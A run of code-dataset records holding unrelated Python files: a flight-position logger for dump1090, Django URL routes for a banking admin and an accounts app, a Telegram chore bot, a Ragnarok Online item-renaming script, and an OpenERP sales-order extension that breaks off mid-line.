self.cursor.execute(self.STMTS['select_aircraft_id'], (hexcode,))\n row = self.cursor.fetchone()\n aircraft_id = row[0]\n\n # Check that this message has not already been added to the database.\n params = (flight_id, aircraft[\"messages\"],)\n self.cursor.execute(self.STMTS['select_position'], params)\n row = self.cursor.fetchone()\n\n if row == None or row[0] != aircraft[\"messages\"]:\n # Add this position to the database.\n if aircraft.has_key('squawk'):\n params = (flight_id, self.time_now, aircraft[\"messages\"], aircraft[\"squawk\"],\n aircraft[\"lat\"], aircraft[\"lon\"], aircraft[\"track\"],\n aircraft[\"altitude\"], aircraft[\"vert_rate\"], aircraft[\"speed\"], aircraft_id,)\n self.cursor.execute(self.STMTS['insert_position_sqwk'], params)\n log(\"\\t\\t\\tInserted position w/ Squawk \" + repr(params))\n else:\n params = (flight_id, self.time_now, aircraft[\"messages\"], aircraft[\"lat\"], aircraft[\"lon\"],\n aircraft[\"track\"], aircraft[\"altitude\"], aircraft[\"vert_rate\"], aircraft[\"speed\"], aircraft_id,)\n self.cursor.execute(self.STMTS['insert_position'], params)\n log(\"\\t\\t\\tInserted position w/o Squawk \" + repr(params))\n else:\n log(\"\\t\\t\\tMessage is the same\")\n\n\nif __name__ == \"__main__\":\n processor = FlightsProcessor(config)\n\n # Main run loop\n while True:\n # Read dump1090-mutability's aircraft.json.\n #with open('/run/dump1090-mutability/aircraft.json') as data_file:\n # data = json.load(data_file)\n\n # Switch from physical file location to using urlopen after the addition of the dump1090-fa option.\n # dump1090-fa and dump1090-mutability store aircraft.json in difrent locations.\n # However Lighttpd is set up to serve this file using the same URL no matter which version is installed.\n response = urlopen('http://localhost/dump1090/data/aircraft.json')\n data = json.load(response)\n\n processor.processAircraftList(data[\"aircraft\"])\n\n log(\"Last Run: \" + datetime.datetime.now().strftime(\"%Y/%m/%d %H:%M:%S\"))\n time.sleep(15)\n\n","sub_path":"build/portal/python/flights.mutability.py","file_name":"flights.mutability.py","file_ext":"py","file_size_in_byte":10809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"142809484","text":"\"\"\"banco URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom . import views\nfrom django.views.generic import TemplateView\n\nurlpatterns = [\n path('administrador/login/', views.login, name='admistrador_login'),\n path('administrador/cliente/', views.lista_cliente, name='admistrador_cliente'),\n path('administrador/cliente/agregar/', views.agregar_cliente, name='admistrador_agregar_cliente'),\n path('administrador/empresa/', views.lista_empresa, name='admistrador_empresa'),\n path('administrador/empresa/agregar/', views.agregar_empresa, name='admistrador_agregar_empresa'),\n path('administrador/cuenta/', views.lista_cuenta, name='admistrador_cuenta'),\n path('administrador/cuenta/agregar/', views.agregar_cuenta, name='admistrador_agregar_cuenta'),\n path('administrador/cuenta/deposito/', views.deposito, name='admistrador_deposito_cuenta'),\n path('administrador/chequera/', views.agregar_chequera, name='admistrador_agregar_chequera'),\n path('administrador/usuario/activar', views.activar_usuario, name='admistrador_activar_usuario'),\n path('administrador/usuario/', views.lista_usuarios, name='admistrador_usuario'),\n path('administrador/cheque/', views.cobrar_cheque, name='admistrador_cobro_cheque'),\n path('administrador/prestamo/', views.aceptar_prestamo, name='admistrador_aceptar_prestamo'),\n path('administrador/tarjeta/agregar', views.agregar_tarjeta, name='admistrador_agregar_tarjeta'),\n]\n","sub_path":"app/administrador/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"601208582","text":"from django.urls import path\nfrom . import views\n\napp_name = 'accounts'\n# changed url from profile-create to profile\nurlpatterns = [\n path('login/', views.LoginView.as_view(), name=\"login\"),\n path('signup/', views.SignUpView.as_view(), name='signup'),\n # path('/profile-detail/', views.ProfileDetailView.as_view(), name='profile-detail'),\n path('profile-detail/', views.profile_detail, name='profile-detail'),\n path('profile/', views.ProfileCreateView.as_view(), name='profile-create'),\n path('user/comments/', views.UserCommentDetailView.as_view(), name='user_comment_list')\n]\n","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"245856324","text":"import telebot\nimport datetime\nimport random\nimport schedule\nimport time\n\nbot = telebot.TeleBot()\n\ntype_clean = ['Уборка кухни', 'Уборка комнат', 'Уборка всей квартиры']\n\nair_control = 'Проветрить квартиру'\n\n\n@bot.message_handler(commands=['start'])\ndef start_message(message):\n bot.reply_to(message, 'Ну привет')\n chat_id = message.chat.id\n save_chat_id(chat_id)\n send_text(chat_id)\n bot.stop_polling()\n\n\ndef CalculateTypeClean():\n chanse = random.randint(0, 100)\n if chanse <= 45:\n return type_clean[0]\n elif chanse <= 80:\n return type_clean[1]\n elif chanse > 80:\n return type_clean[2]\n\n\ndef send_text(chat_id):\n bot.send_message(chat_id, CalculateTypeClean())\n\n\ndef save_chat_id(chat_id):\n file = open('chatid.txt', 'w')\n file.write(str(chat_id))\n file.close()\n\n\ndef load_chat_id():\n file = open('chatid.txt', 'r')\n chat_id = file.read()\n file.close()\n return chat_id\n\ndef main():\n chat_id = load_chat_id()\n if not chat_id:\n bot.polling()\n else:\n send_text(chat_id)\n\nmain()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"47241801","text":"#!/usr/bin/env python.\n'''\n File name: rename_item_db_names.py\n Date created: February 2, 2017\n Python version: 3.6.1\n Version: 1.0.0\n Purpose:\n Rename the item names from an item_db\n and standardizes their forms together.\n Author: Phuc H Duong\n Original Repo: https://github.com/phuchduong/essencero_restoration\n Website: phuchduong.io\n Linkedin: https://www.linkedin.com/in/phuchduong/\n'''\nfrom os import path, makedirs\nimport re # regular expression\nimport subprocess as sp # to open files in a text editor as a subprocess\n\n\n# script goes here\ndef main():\n debug_mode = True\n # Repo folder\n if path.isdir(\"C:/repos\"):\n repo_dir = \"C:/repos\"\n elif path.isdir(\"D:/repos\"):\n repo_dir = \"D:/repos\"\n else:\n repo_dir = \"\" # change this to your own directory\n\n # Repos\n server_repo = \"/essencera/\"\n\n # Input data files\n item_db_in_dir = repo_dir + server_repo + \"/db/import-tmpl/item_db.txt\"\n\n # Builds an output folder if it doesn't exist within the same directory\n # as the executed script.\n out_folder_path = make_output_folder()\n\n # Gets the list of items to rename\n rename_list = get_rename_list()\n\n # Output files\n db_path_out = out_folder_path + \"item_db.txt\"\n rename_and_write_item_db(\n rename_list=rename_list,\n db_path_in=item_db_in_dir,\n db_path_out=db_path_out,\n debug=debug_mode,\n )\n\n # Opens the new iteminfo.lua and item_db.txt in sublime text\n program_dir = \"C:\\Program Files\\Sublime Text 3\\sublime_text.exe\"\n sp.Popen([program_dir, item_db_in_dir])\n sp.Popen([program_dir, db_path_out])\n\n\n# List of items to rename.\ndef get_rename_list():\n return {\n 45042: \"Bat Mask\",\n 45048: \"Black Beret\",\n 45049: \"Blue Beret\",\n 45050: \"Brown Beret\",\n 45051: \"Pink Beret\",\n 45052: \"Purple Beret\",\n 45053: \"Red Beret\",\n 45054: \"White Beret\",\n 45055: \"Yellow Beret\",\n 45056: \"Butterfly Net\",\n 45059: \"Black Winter Hat\",\n 45060: \"Black Wind Milestone\",\n 45065: \"Blue Neck Tie\",\n 45066: \"Black Tailed Ribbon\",\n 45068: \"Blue Robe\",\n 45069: \"Blue Wind Milestone\",\n 45070: \"Blue Bandana Black\",\n 45071: \"Blue Bandana Brown\",\n 45072: \"Blue Bandana Green\",\n 45073: \"Blue Bandana Pink\",\n 45074: \"Blue Bandana Purple\",\n 45075: \"Blue Bandana Red\",\n 45076: \"Blue Bandana White\",\n 45077: \"Blue Bandana Yellow\",\n 45084: \"Blue Tailed Ribbon\",\n 45088: \"Brazilian Flag Hat\",\n 45089: \"Brown Winter Hat\",\n 45090: \"Brown Wind Milestone\",\n 45092: \"Brown Helm of Darkness\",\n 45093: \"Brown Neck Tie\",\n 45094: \"Brown Tailed Ribbon\",\n 45099: \"Blue Bubble Gum\",\n 45100: \"Green Bubble Gum\",\n 45101: \"Pink Bubble Gum\",\n 45125: \"Drooping Choco\",\n 45138: \"Creepy Pumpkin\",\n 45141: \"Cupcake Hat\",\n 45145: \"Deity Mask\",\n 45147: \"Deviling Backpack\",\n 45158: \"Dragoon Wings\",\n 45179: \"Dunce Hat\",\n 45183: \"Empty Eye Socket\",\n 45184: \"Enchanced Shackles\",\n 45185: \"Exodus Wing\",\n 45186: \"Lilika's Butterfly Wings\",\n 45187: \"Fairy Egg\",\n 45190: \"Black Feather Beret\",\n 45191: \"Brown Feather Beret\",\n 45192: \"Green Feather Beret\",\n 45193: \"Pink Feather Beret\",\n 45194: \"Purple Feather Beret\",\n 45195: \"White Feather Beret\",\n 45196: \"Yellow Feather Beret\",\n 45197: \"Feather Mask\",\n 45198: \"Female Smith Pack\",\n 45199: \"Female Super Novice Pack\",\n 45200: \"Ghost of Fallen Bishop\",\n 45202: \"Final Sacrifice Hat\",\n 45207: \"Flower Earrings\",\n 45210: \"Flying Angeling\",\n 45211: \"Freya Crescent's Hat\",\n 45213: \"Frog Hood\",\n 45215: \"Fur Mantle\",\n 45216: \"Black Gangster Scarf\",\n 45217: \"Blue Gangster Scarf\",\n 45218: \"Brown Gangster Scarf\",\n 45219: \"Green Gangster Scarf\",\n 45220: \"Pink Gangster Scarf\",\n 45221: \"Purple Gangster Scarf\",\n 45222: \"White Gangster Scarf\",\n 45223: \"Yellow Gangster Scarf\",\n 45224: \"Gem Bracelet\",\n 45225: \"Gem Necklace\",\n 45227: \"Giga Pudding\",\n 45241: \"Gold Cup\",\n 45243: \"Gold Poring Necklace\",\n 45244: \"Green Winter Hat\",\n 45245: \"Green Wind Milestone\",\n 45246: \"Green Butterfly Wings\",\n 45248: \"Green Nature Wings\",\n 45249: \"Green Neck Tie\",\n 45252: \"Green Tailed Ribbon\",\n 45255: \"Gryphon Item\",\n 45256: \"Gryphon Hat\",\n 45259: \"Gypsy Tiara\",\n 45261: \"Halloween Box\",\n 45262: \"Hane Ribbon\",\n 45266: \"Heart Phones\",\n 45269: \"Heart Wings\",\n 45273: \"Arch Angeling Hat\",\n 45278: \"Holy Wing\",\n 45280: \"Hunny\",\n 45281: \"Huntercap Blue\",\n 45283: \"Drooping Hylozoist\",\n 45284: \"Icecream Cone\",\n 45286: \"Im Gay\",\n 45287: \"Incubus Doll\",\n 45303: \"Black Kawaii Ribbon\",\n 45304: \"Blue Kawaii Ribbon\",\n 45305: \"Brown Kawaii Ribbon\",\n 45306: \"Green Kawaii Ribbon\",\n 45307: \"Pink Kawaii Ribbon\",\n 45308: \"Purple Kawaii Ribbon\",\n 45309: \"White Kawaii Ribbon\",\n 45310: \"Yellow Kawaii Ribbon\",\n 45312: \"Kid's Letter\",\n 45314: \"Drooping Kikki\",\n 45316: \"Lala's Hat\",\n 45322: \"Light Blue Wind Milestone\",\n 45326: \"Sailor Scout's Moon Locket\",\n 45328: \"Love eRO\",\n 45331: \"Black Magic Eyes\",\n 45332: \"Blue Magic Eyes\",\n 45333: \"Brown Magic Eyes\",\n 45334: \"Green Magic Eyes\",\n 45335: \"Pink Magic Eyes\",\n 45336: \"Red Magic Eyes\",\n 45337: \"White Magic Eyes\",\n 45338: \"Yellow Magic Eyes\",\n 45340: \"Majoras Mask\",\n 45341: \"Male Smith Pack\",\n 45342: \"Male Super Novice Pack\",\n 45346: \"Metaling Party Hat\",\n 45348: \"Mini Holy Wings\",\n 45350: \"Mushroom Kingdom Crown\",\n 45354: \"Neko Cookie\",\n 45361: \"Stack of Pancakes\",\n 45366: \"Peco Peco Wing\",\n 45368: \"Phoenix Wings\",\n 45372: \"Drooping Pikachu\",\n 45374: \"Pink Butterfly Wings\",\n 45375: \"Pink Hat\",\n 45376: \"Pink Helm of Darkness\",\n 45377: \"Pink Neck Tie\",\n 45381: \"Poring Envelope\",\n 45383: \"Poring Party Hat\",\n 45385: \"Poring Rucksack\",\n 45386: \"Drooping Praetor\",\n 45389: \"Purple Wind Milestone\",\n 45390: \"Purple Butterfly Wings\",\n 45391: \"Purple Hat\",\n 45392: \"Purple Helm of Darkness\",\n 45393: \"Purple Neck Tie\",\n 45395: \"Purple Tailed Ribbon\",\n 45396: \"Shadow Arrow Quiver\",\n 45397: \"Crystal Arrow Quiver\",\n 45398: \"Earth Arrow Quiver\",\n 45399: \"Wind Arrow Quiver\",\n 45400: \"Immaterial Arrow Quiver\",\n 45401: \"Holy Arrow Quiver\",\n 45402: \"Poison Arrow Quiver\",\n 45403: \"Fire Arrow Quiver\",\n 45404: \"Rare Candy\",\n 45405: \"Randgris Helmet\",\n 45408: \"Red Winter Hat\",\n 45409: \"Black Redbonnet\",\n 45410: \"Blue Redbonnet\",\n 45411: \"Brown Redbonnet\",\n 45412: \"Green Redbonnet\",\n 45413: \"Pink Redbonnet\",\n 45414: \"Purple Redbonnet\",\n 45415: \"White Redbonnet\",\n 45416: \"Yellow Redbonnet\",\n 45419: \"Red Helm of Darkness\",\n 45420: \"Red Neck Tie\",\n 45422: \"Little Red Riding Hood\",\n 45426: \"Ribbon Wizard Hat\",\n 45430: \"Blue Romantic Flower\",\n 45431: \"Purple Romantic Flower\",\n 45432: \"Red Romantic Flower\",\n 45437: \"Sapphire Earrings\",\n 45440: \"Sarasand Kingdom Crown \",\n 45443: \"Shedinja Halo\",\n 45444: \"Shedinja Mask\",\n 45445: \"Shedinja Wings\",\n 45446: \"Shinobi Helm\",\n 45447: \"Fang of Skoll\",\n 45453: \"Snowflake Ring\",\n 45458: \"Squatting Drops\",\n 45459: \"Squatting Marin\",\n 45460: \"Squatting Poporing\",\n 45461: \"Plumber's Stash\",\n 45472: \"Teddy Bear Ears\",\n 45473: \"Tengu Mask\",\n 45482: \"Twin Swords\",\n 45483: \"U Mad\",\n 45485: \"United Cap\",\n 45487: \"Valentines Ribbon Hat\",\n 45489: \"White Butterfly Wings\",\n 45494: \"Vote Post\",\n 45498: \"White Winter Hat\",\n 45499: \"White Wind Milestone\",\n 45501: \"White Hat\",\n 45502: \"White Helm of Darkness\",\n 45503: \"White Neck Tie\",\n 45504: \"White Tailed Ribbon\",\n 45506: \"Why So Serious\",\n 45507: \"Peco Peco Ears\",\n 45508: \"Wizard Beard\",\n 45509: \"Wooper Hat\",\n 45513: \"Yellow Winter Hat\",\n 45514: \"Yellow Wind Milestone\",\n 45515: \"Yellow Butterfly Wings\",\n 45516: \"Yellow Helm of Darkness\",\n 45517: \"Yellow Neck Tie\",\n 45518: \"Yellow Quiz Hat\",\n 45519: \"Yellow Tailed Ribbon\",\n 45564: \"2b Mask\",\n 46015: \"Level 1 Donor Token\",\n 46016: \"Level 2 Donor Token\",\n 46017: \"Mystery Headgear Envelope\",\n 46310: \"Individual Guild Package\",\n 46311: \"Guild Package 2a\",\n 46312: \"Guild Package 2b\",\n 46313: \"Guild Package 1a\",\n 51302: \"Snowbunny Pokeball\",\n 51303: \"Atroce Pokeball\",\n 51304: \"Doppelganger Pokeball\",\n 51305: \"Drake Pokeball\",\n 51306: \"Eddga Pokeball\",\n 51307: \"Gloom Under Night Pokeball\",\n 51308: \"Golden Thief Bug Pokeball\",\n 51309: \"Ifrit Pokeball\",\n 51310: \"Mistress Pokeball\",\n 51311: \"Moonlight Flower Pokeball\",\n 51312: \"Osiris Pokeball\",\n 51313: \"Pharaoh Pokeball\",\n 51314: \"Stormy Knight Pokeball\",\n 51315: \"Tao Gunka Pokeball\",\n 51316: \"Turtle General Pokeball\",\n 51317: \"Valkyrie Randgris Pokeball\",\n 51318: \"Am Mut Pokeball\",\n 51319: \"Cat O Nine Tails Pokeball\",\n 51320: \"Cecil Damon Pokeball\",\n 51321: \"Deviace Pokeball\",\n 51322: \"Eremes Guile Pokeball\",\n 51323: \"Giant Hornet Pokeball\",\n 51324: \"Howard Alt-Eisen Pokeball\",\n 51325: \"Jakk Pokeball\",\n 51326: \"Kathryne Keyron Pokeball\",\n 51327: \"Margaretha Solin Pokeball\",\n 51328: \"Mavka Pokeball\",\n 51329: \"Seyren Windsor Pokeball\",\n 51330: \"Skeleton General Pokeball\",\n 51331: \"Teddy Bear Pokeball\",\n 51332: \"Tengu Pokeball\",\n 51333: \"Zombie Master Pokeball\",\n 51334: \"Antonio Pokeball\",\n 51335: \"Christmas Jakk Pokeball\",\n 51336: \"Garden Keeper Pokeball\",\n 51337: \"Garden Watcher Pokeball\",\n 51338: \"Earth Crystal Pokeball\",\n 51339: \"Fire Crystal Pokeball\",\n 51340: \"Golden Savage Pokeball\",\n 51341: \"Water Crystal Pokeball\",\n 51342: \"Wind Crystal Pokeball\",\n }\n\n\n# Loads the local file system, else create a new one.\ndef make_output_folder():\n # Requires import os\n # Get the current file path of the script.\n script_dir = path.dirname(path.realpath(__file__))\n file_system_path = script_dir + \"/outputs/\"\n system_folder_exists = path.isdir(file_system_path)\n\n # Creates a system folder if it does not exist.\n if system_folder_exists:\n print(\"Output folder found...\")\n else:\n print(\"Initializing output folder...\")\n # creates a folder called \"build_item_info_files\" in the script directory\n makedirs(file_system_path)\n print(\"Created folder: \" + file_system_path)\n\n return(file_system_path)\n\n\n# Traveres an item_db.txt and gets all item_ids and item names.\ndef parse_item_names_from_item_db(db_path, debug):\n item_regex = \"^\\d{3,5},\"\n item_db = {}\n is_item = re.compile(item_regex)\n with open(file=db_path, mode=\"r\") as f:\n for line in f:\n if is_item.match(line):\n line_split = line.split(\",\")\n item_id = int(line_split[0])\n aegis_name = line_split[1]\n rathena_name = line_split[2]\n item_db[item_id] = {\n \"aegis_name\": aegis_name,\n \"rathena_name\": rathena_name\n }\n if debug:\n print(str(item_id) + \"\\t\" + aegis_name + \"\\t\" + rathena_name)\n return item_db\n\n\n# Writes out a new item_db.txt and renames the items from a list of items to rename.\ndef rename_and_write_item_db(rename_list, db_path_in, db_path_out, debug):\n f_out = open(file=db_path_out, mode=\"w\")\n\n item_regex = \"^\\d{3,5},\"\n is_item_id = re.compile(item_regex)\n with open(file=db_path_in, mode=\"r\") as f_in:\n for line in f_in:\n if is_item_id.search(line):\n line_split = line.split(\",\")\n item_id = int(line_split[0])\n if item_id in rename_list:\n # rename the item\n item_name = rename_list[item_id]\n aegis_name = item_name.replace(\" \", \" \").replace(\" \", \"_\")\n line_split[2] = item_name\n line_split[1] = aegis_name\n renamed_line = \",\".join(line_split)\n f_out.write(renamed_line)\n else:\n f_out.write(line)\n else:\n f_out.write(line)\n f_out.close()\n\n\nmain()\n","sub_path":"scripts/legacy/rename_item_db_names.py","file_name":"rename_item_db_names.py","file_ext":"py","file_size_in_byte":13319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"20868800","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# This module uses OpenERP, Open Source Management Solution Framework.\n# Copyright (C) 2014-Today BrowseInfo ()\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see \n#\n##############################################################################\nfrom openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT, DATETIME_FORMATS_MAP\nfrom datetime import datetime, date\nfrom openerp.osv import osv, fields\nfrom openerp.tools.translate import _\nfrom openerp import netsvc\n\nclass sale_order(osv.Model):\n _inherit = 'sale.order'\n\n def write(self, cr, uid, ids, vals, context=None):\n today_date = datetime.now()\n vals.update({'date_ext':today_date})\n return super(sale_order, self).write(cr, uid, ids, vals, context=context)\n\n def create(self, cr, uid, vals, context=None):\n if not vals.get('date_ext'):\n today_date = datetime.now()\n vals['date_ext'] = today_date\n return super(sale_order, self).create(cr, uid, vals, context=context)\n\n def _get_branch(self, cr, uid, context=None):\n if context is None:\n context = {}\n res_user_browse = self.pool.get('res.users').browse(cr, uid, [uid], context=context)[0]\n if res_user_browse.branch_id:\n return res_user_browse.branch_id.id\n\n _columns = {\n 'branch_id': fields.many2one('res.branch', 'Branch', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}),\n 'date_ext':fields.date(\"Modified Date\", readonly=True),\n 'exchange_rate': fields.float('Exchange Rate', readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}),\n }\n _order = \"date_ext\"\n\n _defaults = {\n 'branch_id': _get_branch,\n }\n \n def _prepare_order_line_move(self, cr, uid, order, line, picking_id, date_planned, context=None):\n location_id = order.shop_id.warehouse_id.lot_stock_id.id\n output_id = order.shop_id.warehouse_id.lot_output_id.id\n return {\n 'name': line.name,\n 'picking_id': picking_id,\n 'product_id': line.product_id.id,\n 'date': date_planned,\n 'date_expected': date_planned,\n 'product_qty': line.product_uom_qty,\n 'product_uom': line.product_uom.id,\n 'product_uos_qty': (line.product_uos and line.product_uos_qty) or line.product_uom_qty,\n 'product_uos': (line.product_uos and line.product_uos.id)\\\n or line.product_uom.id,\n 'product_packaging': line.product_packaging.id,\n 'partner_id': line.address_allotment_id.id or order.partner_shipping_id.id,\n 'location_id': location_id,\n 'location_dest_id': output_id,\n 'sale_line_id': line.id,\n 'tracking_id': False,\n 'state': 'draft',\n #'state': 'waiting',\n 'company_id': order.company_id.id,\n 'price_unit': line.product_id.standard_price or 0.0,\n 'branch_id': order.branch_id.id or False\n }\n \n def _prepare_order_picking(self, cr, uid, order, context=None):\n result = super(sale_order, self)._prepare_order_picking(cr, uid, order, context=context)\n result.update({'branch_id': order.branch_id.id})\n return result\n\n def _prepare_order_line_procurement(self, cr, uid, order, line, move_id, date_planned, context=None):\n result = super(sale_order, self)._prepare_order_line_procurement(cr, uid, order, line, move_id, date_planned, context=context)\n result.update({'branch_id': order.branch_id.id})\n return result\n\nsale_order()\n\nclass sale_order_line_make_invoice(osv.osv_memory):\n _inherit= 'sale.order.line.make.invoice'\n \n def make_invoices(self, cr, uid, ids, context=None):\n \"\"\"\n To make invoices.\n\n @param self: The object pointer.\n @param cr: A database cursor\n @param uid: ID of the user currently logged in\n @param ids: the ID or list of IDs\n @param context: A standard dictionary\n\n @return: A dictionary which of fields with values.\n\n \"\"\"\n if context is None: context = {}\n res = False\n invoices = {}\n\n #TODO: merge with sale.py/make_invoice\n def make_invoice(order, lines):\n \"\"\"\n To make invoices.\n\n @param order:\n @param lines:\n\n @return:\n\n \"\"\"\n a = order.partner_id.property_account_receivable.id\n if order.partner_id and order.partner_id.property_payment_term.id:\n pay_term = order.partner_id.property_payment_term.id\n else:\n pay_term = False\n inv = {\n 'name': order.client_order_ref or '',\n 'origin': order.name,\n 'type': 'out_invoice',\n 'reference': \"P%dSO%d\" % (order.partner_id.id, order.id),\n 'account_id': a,\n 'partner_id': order.partner_invoice_id.id,\n 'invoice_line': [(6, 0, lines)],\n 'currency_id' : order.pricelist_id.currency_id.id,\n 'comment': order.note,\n 'payment_term': pay_term,\n 'fiscal_position': order.fiscal_position.id or order.partner_id.property_account_position.id,\n 'user_id': order.user_id and order.user_id.id or False,\n 'company_id': order.company_id and order.company_id.id or False,\n 'date_invoice': fields.date.today(),\n 'branch_id': order.branch_id.id or False,\n \t'custom_invoice_no': order.invoice_no or '',\n 'discount_method': order.discount_method,\n 'discount_amount': order.discount_amount or 0.0,\n }\n inv_id = self.pool.get('account.invoice').create(cr, uid, inv)\n return inv_id\n\n sales_order_line_obj = self.pool.get('sale.order.line')\n sales_order_obj = self.pool.get('sale.order')\n wf_service = netsvc.LocalService('workflow')\n for line in sales_order_line_obj.browse(cr, uid, context.get('active_ids', []), context=context):\n if (not line.invoiced) and (line.state not in ('draft', 'cancel')):\n if not line.order_id in invoices:\n invoices[line.order_id] = []\n line_id = sales_order_line_obj.invoice_line_create(cr, uid, [line.id])\n for lid in line_id:\n invoices[line.order_id].append(lid)\n for order, il in invoices.items():\n res = make_invoice(order, il)\n cr.execute('INSERT INTO sale_order_invoice_rel \\\n (order_id,invoice_id) values (%s,%s)', (order.id, res))\n flag = True\n data_sale = sales_order_obj.browse(cr, uid, order.id, context=context)\n for line in data_sale.order_line:\n if not line.invoiced:\n flag = False\n break\n if flag:\n wf_service.trg_validate(uid, 'sale.order', order.id, 'manual_invoice', cr)\n\n if not invoices:\n raise osv.except_osv(_('Warning!'), _('Invoice cannot be created for this Sales Order Line due to one of the following reasons:\\n1.The state of this sales order line is either \"draft\" or \"cancel\"!\\n2.The Sales Order Line is Invoiced!'))\n if context.get('open_invoices', False):\n return self.open_invoices(cr, uid, ids, res, context=context)\n return {'type': 'ir.actions.act_window_close'}\n \nclass sale_advance_payment_inv(osv.osv_memory):\n _inherit = 'sale.advance.payment.inv'\n\n def _prepare_advance_invoice_vals(self, cr, uid, ids, context=None):\n if context is None:\n context = {}\n sale_obj = self.pool.get('sale.order')\n ir_property_obj = self.pool.get('ir.property')\n fiscal_obj = self.pool.get('account.fiscal.position')\n inv_line_obj = self.pool.get('account.invoice.line')\n wizard = self.browse(cr, uid, ids[0], context)\n sale_ids = context.get('active_ids', [])\n\n result = []\n for sale in sale_obj.browse(cr, uid, sale_ids, context=context):\n val = inv_line_obj.product_id_change(cr, uid, [], wizard.product_id.id,\n uom_id=False, partner_id=sale.partner_id.id, fposition_id=sale.fiscal_position.id)\n res = val['value']\n\n # determine and check income account\n if not wizard.product_id.id :\n prop = ir_property_obj.get(cr, uid,\n 'property_account_income_categ', 'product.category', context=context)\n prop_id = prop and prop.id or False\n account_id = fiscal_obj.map_account(cr, uid, sale.fiscal_position or False, prop_id)\n if not account_id:\n raise osv.except_osv(_('Configuration Error!'),\n _('There is no income account defined as global property.'))\n res['account_id'] = account_id\n if not res.get('account_id'):\n raise osv.except_osv(_('Configuration Error!'),\n _('There is no income account defined for this product: \"%s\" (id:%d).') % \\\n (wizard.product_id.name, wizard.product_id.id,))\n\n # determine invoice amount\n if wizard.amount <= 0.00:\n raise osv.except_osv(_('Incorrect Data'),\n _('The value of Advance Amount must be positive.'))\n if wizard.advance_payment_method == 'percentage':\n inv_amount = sale.amount_total * wizard.amount / 100\n if not res.get('name'):\n res['name'] = _(\"Advance of %s %%\") % (wizard.amount)\n else:\n inv_amount = wizard.amount\n if not res.get('name'):\n #TODO: should find a way to call formatLang() from rml_parse\n symbol = sale.pricelist_id.currency_id.symbol\n if sale.pricelist_id.currency_id.position == 'after':\n res['name'] = _(\"Advance of %s %s\") % (inv_amount, symbol)\n else:\n res['name'] = _(\"Advance of %s %s\") % (symbol, inv_amount)\n\n # determine taxes\n if res.get('invoice_line_tax_id'):\n res['invoice_line_tax_id'] = [(6, 0, res.get('invoice_line_tax_id'))]\n else:\n res['invoice_line_tax_id'] = False\n\n # create the invoice\n inv_line_values = {\n 'name': res.get('name'),\n 'origin': sale.name,\n 'account_id': res['account_id'],\n 'price_unit': inv_amount,\n 'quantity': wizard.qtty or 1.0,\n 'discount': False,\n 'uos_id': res.get('uos_id', False),\n 'product_id': wizard.product_id.id,\n 'invoice_line_tax_id': res.get('invoice_line_tax_id'),\n 'account_analytic_id': sale.project_id.id or False,\n }\n inv_values = {\n 'name': sale.client_order_ref or sale.name,\n 'origin': sale.name,\n 'type': 'out_invoice',\n 'reference': sale.client_order_ref or sale.name,\n 'account_id': sale.partner_id.property_account_receivable.id,\n 'partner_id': sale.partner_invoice_id.id,\n 'invoice_line': [(0, 0, inv_line_values)],\n 'currency_id': sale.pricelist_id.currency_id.id,\n 'comment': '',\n 'branch_id': sale.branch_id.id,\n 'payment_term': sale.payment_term.id,\n 'fiscal_position': sale.fiscal_position.id or sale.partner_id.property_account_position.id,\n \t'custom_invoice_no': sale.invoice_no or '',\n 'discount_method': sale.discount_method,\n 'discount_amount': sale.discount_amount or 0.0,\n\n }\n result.append((sale.id, inv_values))\n return result\n\nclass sale_order_line(osv.Model):\n _inherit = 'sale.order.line'\n\n def product_id_change(self, cr, uid, ids, pricelist, product, qty=0,\n uom=False, qty_uos=0, uos=False, name='', partner_id=False,\n lang=False, update_tax=True, date_order=False, packaging=False, fiscal_position=False, flag=False, exchange_rate=0, context=None):\n res_currency = self.pool.get('res.currency')\n context = context or {}\n lang = lang or context.get('lang',False)\n if not partner_id:\n raise osv.except_osv(_('No Customer Defined!'), _('Before choosing a product,\\n select a customer in the sales form.'))\n warning = {}\n product_uom_obj = self.pool.get('product.uom')\n partner_obj = self.pool.get('res.partner')\n product_obj = self.pool.get('product.product')\n product_pricelist = self.pool.get('product.pricelist')\n\n context = {'lang': lang, 'partner_id': partner_id}\n if partner_id:\n lang = partner_obj.browse(cr, uid, partner_id).lang\n context_partner = {'lang': lang, 'partner_id': partner_id}\n\n if not product:\n return {'value': {'th_weight': 0,\n 'product_uos_qty': qty}, 'domain': {'product_uom': [],\n 'product_uos': []}}\n if not date_order:\n date_order = time.strftime(DEFAULT_SERVER_DATE_FORMAT)\n\n result = {}\n warning_msgs = ''\n product_obj = product_obj.browse(cr, 